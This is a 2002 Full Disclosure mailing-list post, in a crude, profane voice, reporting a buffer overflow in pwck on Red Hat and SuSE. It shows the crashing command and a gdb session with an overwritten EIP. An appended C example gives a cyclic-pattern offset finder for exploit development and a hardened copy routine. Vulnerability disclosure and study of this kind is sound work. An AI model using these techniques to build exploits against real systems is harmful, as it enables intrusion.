Full Disclosure mailing list archives

Overflow in "pwck" on Redhat 8.x and Suse


From: Day Jay <d4yj4y () yahoo com>
Date: Wed, 20 Nov 2002 23:24:59 -0800 (PST)

d4y-j4y from Chung's Donut Shop has found a problem
with "pwck" on Redhat 8.0 and Suse 7.x -- probably an
issue with later versions as well. 

Per the documentation:

pwck: verifies the integrity of the system authentication information. All entries in the /etc/passwd and /etc/shadow are checked to see that the entry has the proper format and valid data in each field. The user is prompted to delete entries that are improperly formatted or which have other incorrectable errors.

With that in mind, the program is insecure. It's not setuid root, but it could have other implications; I don't know what.

[root@yourmom]# /usr/sbin/pwck `perl -e 'print "Chungs_Donut_Shop" x 135'`
Segmentation fault
[root@yourmom]# interesting
sh: interesting: command not found
[root@yourmom]# gdb /usr/sbin/pwck
GNU gdb 20010316
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...(no debugging symbols found)...
(gdb) set args `perl -e 'print "Z" x 6999'`
(gdb) run
Starting program: /usr/sbin/pwck `perl -e 'print "Z" x 6999'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x5a5a5a5a in ?? ()
(gdb) info reg eip
eip            0x5a5a5a5a       0x5a5a5a5a
(gdb) whoa we overwrote the eip
Undefined command: "whoa".  Try "help".
(gdb) quit

So we have overwritten the EIP with ZZZZZZZZZZZZs.
It's sleepy.

Anyway, too lazy to try to write another non-setuid-root exploit. So, there you go. I also haven't checked out the source because I'm too lazy and I'm not good at reading or really writing code. I'm also too lazy to find the exact buffer size, so fuck you.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
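Added example, not part of the post above and not taken from pwck's source (which the post says was not examined): the gdb session shows EIP overwritten with 0x5a5a5a5a after a run of 6999 'Z' bytes, but leaves the overwrite offset unmeasured. The standard way to get it is to pass a cyclic pattern instead of a single repeated byte, so the four bytes that land in the saved return address identify where in the argument they came from. The C program below does that, and also shows the bounded copy a maintainer would use in place of an unchecked strcpy of an argv string, which is the bug class this crash is consistent with. The function names (pattern_create, pattern_offset, fill_word, copy_arg_checked) are this example's own; the little-endian 32-bit EIP matches the i386 target in the post.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Cyclic pattern "Aa0Aa1Aa2...": every aligned 3-byte triple is unique
 * within the first 26*26*10*3 = 20280 bytes, so any 4-byte window that
 * ends up in the saved return address maps back to one offset.
 * `out` must have room for len + 1 bytes (pattern plus NUL). */
static size_t pattern_create(char *out, size_t len) {
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                char trip[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = trip[i];
            }
    out[n] = '\0';
    return n;
}

/* Given the EIP value gdb reported (a little-endian 32-bit word on i386),
 * return the offset in the pattern where those 4 bytes start, or -1 if the
 * value did not come from the pattern (e.g. a partial overwrite). */
static long pattern_offset(const char *pat, size_t len, uint32_t eip) {
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)((eip >> (8 * i)) & 0xff);
    for (size_t off = 0; off + 4 <= len; off++)
        if (memcmp(pat + off, needle, 4) == 0)
            return (long)off;
    return -1;
}

/* The word a run of one fill byte leaves in EIP: 'Z' (0x5a) gives
 * 0x5a5a5a5a, exactly what the gdb output in the post shows. */
static uint32_t fill_word(unsigned char c) {
    return (uint32_t)c * 0x01010101u;
}

/* Hardened replacement for `strcpy(buf, argv[1])` into a fixed buffer:
 * refuse input that does not fit (including its NUL) instead of
 * overflowing or silently truncating. Returns 0 on success, -1 if too long. */
static int copy_arg_checked(char *dst, size_t dstsz, const char *src) {
    const char *nul = memchr(src, '\0', dstsz);
    if (nul == NULL)
        return -1;                 /* no terminator within dstsz: too long */
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Usage: ./cyclic LEN           -> prints a LEN-byte pattern
 *        ./cyclic LEN 0xEIPHEX  -> prints the offset of that EIP value */
int main(int argc, char **argv) {
    if (argc < 2 || argc > 3) {
        fprintf(stderr, "usage: %s LEN [EIP_HEX]\n", argv[0]);
        return 2;
    }
    size_t len = strtoul(argv[1], NULL, 0);
    char *pat = malloc(len + 1);
    if (pat == NULL)
        return 1;
    pattern_create(pat, len);
    if (argc == 2) {
        puts(pat);
    } else {
        uint32_t eip = (uint32_t)strtoul(argv[2], NULL, 16);
        printf("%ld\n", pattern_offset(pat, len, eip));
    }
    free(pat);
    return 0;
}
```

Run the target with the pattern in place of the 'Z' run, e.g. `gdb --args /usr/sbin/pwck "$(./cyclic 7000)"`, read the faulting EIP, then `./cyclic 7000 0x<eip>` prints how many bytes of argument precede the saved return address; -1 means the value did not come from the pattern and the overwrite should be re-examined.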